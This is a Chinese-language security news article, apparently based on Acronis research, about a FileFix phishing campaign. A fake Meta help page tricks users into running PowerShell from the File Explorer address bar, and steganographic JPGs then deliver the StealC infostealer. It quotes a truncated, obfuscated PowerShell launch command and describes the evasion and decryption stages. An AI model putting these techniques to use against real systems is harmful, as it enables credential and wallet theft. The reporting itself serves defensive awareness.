一场复杂的网络威胁活动已然出现,这标志着社会工程学攻击有了重大进展,它首次在现实世界中应用了FileFix攻击方法,而非仅仅停留在概念验证演示阶段。
这种高级威胁利用隐写术技术,将恶意有效载荷隐藏在看似无害的JPG图像中,最终将StealC信息窃取器植入受感染的系统。
此次攻击活动与传统的ClickFix方法有显著不同,它利用HTML中的文件上传功能,诱骗受害者通过Windows文件资源管理器的地址栏执行恶意的PowerShell命令。
与依赖终端访问的传统方法不同,这种FileFix变体针对的是更具普遍可访问性的文件上传界面,这可能会将攻击面扩大到那些可能从未打开过命令行界面的用户。
此次活动背后的威胁行为者投入了大量资源,开发了一个多语言钓鱼基础设施,该设施模仿了Facebook的安全页面,涉及16种语言,包括阿拉伯语、俄语、印地语、日语、波兰语、德语、西班牙语、法语、马来语和乌尔都语。
这种复杂的社会工程学伪装会警告受害者其账户即将被停用,并催促他们通过一个虚假的文件路径访问所谓的事件报告,而该路径正是攻击媒介。
这个钓鱼网站模仿了Meta帮助支持页面的外观(来源——Acronis)
安克诺斯的研究人员发现,此次攻击活动是“文件修复”(FileFix)方法的首次复杂应用,与研究人员d0x先生在2025年7月开发的原始概念验证有显著差异。
此次攻击展现出极高的技术复杂度,它融合了多层混淆、反分析机制以及复杂的多阶段有效载荷交付系统,为这类威胁的规避技术树立了新的标准。
这场活动的全球影响力从多个国家的VirusTotal提交数据中可见一斑,这些国家包括美国、孟加拉国、菲律宾、突尼斯、尼泊尔、多米尼加共和国、塞尔维亚、秘鲁、中国和德国,这表明存在一种协调的国际定向策略,旨在最大限度地扩大在不同地理区域的受害者覆盖面。
隐写载荷隐藏与多阶段执行
此次攻击最具创新性的地方在于,它巧妙地运用隐写术,将第二阶段的PowerShell脚本和加密的可执行有效载荷嵌入到人工生成的、带有田园风光的风景图像中。
这些JPG文件托管在BitBucket等合法平台上,在特定字节位置包含恶意代码,这些代码会通过精心策划的过程被提取并执行。
初始的PowerShell有效载荷采用了大量的混淆技术,将命令拆分为变量并利用Base64编码来规避基于模式的检测系统。
该命令结构展现出高级的规避能力:-
PowerShell -noP -W H -ep Bypass -C "$if=[System.IO.File];$ifr=$if::ReadAllBytes;$ifw=$if::WriteAllBytes;$e=[System.Text.Encoding]::UTF8..."有效载荷执行后,会将隐写图像下载到受害者的临时目录,并从文件结构内预定的字节范围内提取嵌入的第二阶段脚本。
这个次要脚本实现了RC4解密和gzip解压缩功能,用于处理隐藏的可执行有效载荷,最终部署一个基于Go语言的加载器,该加载器具备虚拟机检测能力和字符串加密机制。
最终的有效载荷会投放StealC恶意软件,这是一种全面的信息窃取工具,针对浏览器凭据、加密货币钱包、 messaging应用程序、游戏平台、VPN配置以及热门应用中的云服务凭据,包括Chrome、Firefox、Telegram、Discord、各种加密货币钱包以及AWS/Azure认证密钥,旨在建立持久访问权限,以便进行持续的数据窃取操作。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。
